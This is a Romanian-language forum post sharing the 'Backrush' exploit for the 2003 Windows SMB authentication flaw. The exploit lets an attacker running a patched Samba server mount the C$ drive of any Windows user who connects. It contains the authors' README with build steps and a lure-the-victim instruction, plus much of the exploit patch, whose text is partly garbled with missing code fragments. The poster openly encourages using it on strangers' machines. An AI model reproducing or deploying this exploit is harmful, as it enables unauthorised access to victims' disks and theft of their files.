1098

Iaka un exploit pi*zdatenii !!! Montezi diskul C$ la tine pe vint de ciuvacii din reteaua ta sau din reteaua globala :)

Nii cam rushine sa intru acia :) da am intrat deam :)Vapheta nustiu daca o sa va ajute, cum am inteles aici in sectia "crack hack" cam toti stau pe windows :) (da poate greshesk si este vreun unixoid, daca este apu rushine :) sectia asta ii cam lamereasca fara suparare, ce caut eu aici ? vreau doar sa ridic oleaca nastroenia la unii lameri :) ) eu exploitu l-am avut cind windows xp avea doar sp1 si win2k avea doar sp3 si totul mergea superb si acum trebu sa mearga superb mai ales ca nu toti de pe xp au sp2 :) daca doriti sa intrati in detalii ce fac exploitu respectiv cititi ce scrie mai jos (presupun ca cunosti engleza .. si mai intrati in sectia linux, unix, freebsd :) Dar ca rezumat explic: de sub linux instalezi samba server si cineva din reteaua ta sau din internet cind se va conecta la tine crezind ca tu tot stai pe windows si cind va incerca sa downloadeze ceva de pe share-ul tau apu de la el automat se va monta diskul C la tine pe vint .... :) daca ai miini care cresc de unde trebu apu poti face ca toate diskurile sa se monteze :) * README * ########################################### Exploit for "Authentication flaw in Windows SMB protocol" ############################################ Release Date: # April 24, 2003 # # Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir) # Salman Niksefat (salman@linux.ce.aut.ac.ir) # # Systems Affected by this exploit: # Windows 2000 (SP0 SP1 SP2 SP3) # Windows XP (SP0 SP1) # # EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT # WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE. ##########################################This exploit is based on samba-2.2.8a, you can download the source code from:http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2or other mirrors.First you should configure and make samba source code as follow:You need first to extract the file:$ tar -jxf samba-2.2.8a.tar.bz2$ cd samba-2.2.8a/sourceHere you need to configure with suitable options. Here is a config for RedHat 9:$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages--with-lockdir=/var/cache/samba --with-configdir=/etc/samba$ make$ make bin/smbmount$ su# make installFirst add an arbitary user to samba: (Choose a reliable password for it for your protection!)# smbadduser smbtmpuser:rootNow check if your samba server(bin/smbd) and client(bin/smbmount) are working, and that ipchains rulls are not set. you can use:# service smbd stop# bin/smbd -i# ipchains -FWell, now if everything works fine, you can apply the exploit code to the source.Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch# patch 2. Invite him/her to visit your personal web page.You can make it by the above tag, then pray and wait until he/she visits your page. ;)Enjoy! * backrush.patch * diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430@@ -26,6 +26,10 @@#include #include #include +//>Backrush+int br_read[2], br_write[2], br_pid;+struct Backrush br_state;+//Backrush+ {+ int i;+ printf("challange: ");+ for (i = 0; i cryptkey[i]);+ fflush(stdout);+ memcpy(br_state.challenge, c->cryptkey, 8);+ br_state.status = 1;+ write(br_write[1],&br_state, sizeof(br_state));+ printf(" sent to server\n");+ printf("waiting for response...\n");+ fflush(stdout); + }+//Backrush+ printf("Started to mount %s on %s\n",argv[1], argv[2]);+ fflush(stdout);+ if (getenv("BACKRUSH_READ")) + br_read[0] = atoi(getenv("BACKRUSH_READ"));+ if (getenv("BACKRUSH_WRITE"))+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));+//Backrush+#include +#include +struct Backrush+{+ int status;+ char ip_address[20];+ int port;+ char username[256];+ char sharename[256];+ char netbios[256];+ char domain[256];+ char challenge[8];+ char nt_resp[24];+ char lm_resp[24];+};+extern struct Backrush br_state;+extern int br_read[2],br_write[2],br_pid;+//Backrush+ {+ int i;+ read(br_read[0],&br_state, sizeof(br_state));+ printf("received response:\n");+ fflush(stdout);+ memcpy(pword, br_state.lm_resp, 24);+ memcpy(ntpword, br_state.nt_resp, 24);+ if(br_state.username[0])+ strncpy(user, br_state.username, 24);+ printf("username: %s\n", user);+ printf("lm response: ");+ for (i = 0; i outbuf,'\0',smb_size);diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430@@ -180,6 +180,45 @@doencrypt = ((cli->sec_mode & 2) != 0);}+//>Backrush+ {+ srand(time(NULL));+ pipe(br_read);+ pipe(br_write);+ br_state.status = 1;+ br_state.port = random();+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));+ {+ char tmp[1024], *ptr;+ FILE *fin = fopen("backrush/ip2sharename.map","r");+ if (fin)+ {+ while(fscanf(fin, "%s", tmp) > 0)+ {+ ptr = strchr(tmp, ':');+ *ptr++ = 0;+ if (!strcmp(br_state.ip_address,tmp))+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));+ }+ fclose(fin);+ }+ }+ if (!(br_pid = fork()))+ {+ char cmd[1024];+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ _exit(0);+ }+ }+//Backrush+ read(br_read[0],&br_state, sizeof(br_state));+ memcpy(buf, br_state.challenge, 8);+//Backrush+ memcpy(br_state.nt_resp, nt_pass, 24);+ memcpy(br_state.lm_resp, lm_pass, 24);+ write(br_write[1],&br_state, sizeof(br_state));+// waitpid(br_pid,NULL,WNOHANG);+ return(False);+//Backrush + strncpy(br_state.username,user,sizeof(br_state.username));+ strncpy(user,"root",sizeof(br_state.username));+//+int am_parent = 1;/* the last message the was processed */
0